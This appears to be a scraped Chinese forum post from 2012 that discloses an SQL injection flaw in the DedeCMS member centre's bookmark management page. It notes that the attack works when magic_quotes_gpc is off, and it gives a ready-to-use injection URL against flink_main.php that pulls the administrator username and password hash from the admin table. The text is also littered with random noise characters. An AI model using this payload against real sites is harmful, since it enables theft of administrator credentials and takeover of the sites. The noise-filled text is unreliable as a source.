DedeCMS会员中心SQL注射漏洞2 Q! | k7 ~4 k3 b; r) L3 r7 K
需要magic_quotes_gpc = Off
; o, j3 g4 S9 Q会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
$ A% ?. ]/ T' i/ K2 ~ j$ t
$ d+ R3 m$ f( c7 uDedeCMS会员中心书签管理SQL注射漏洞; \- j) Q7 r0 l
成功利用该漏洞可获得管理员密码3 R* }9 v8 V) n) o9 R$ M5 H
B9 k. d+ X' S" O6 _; M
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
* p% h& U$ `, t; Z f
h& k% c3 g. j& O' v t- D- Khttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
( y) ?0 A" x* k( B6 F* m: ? |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59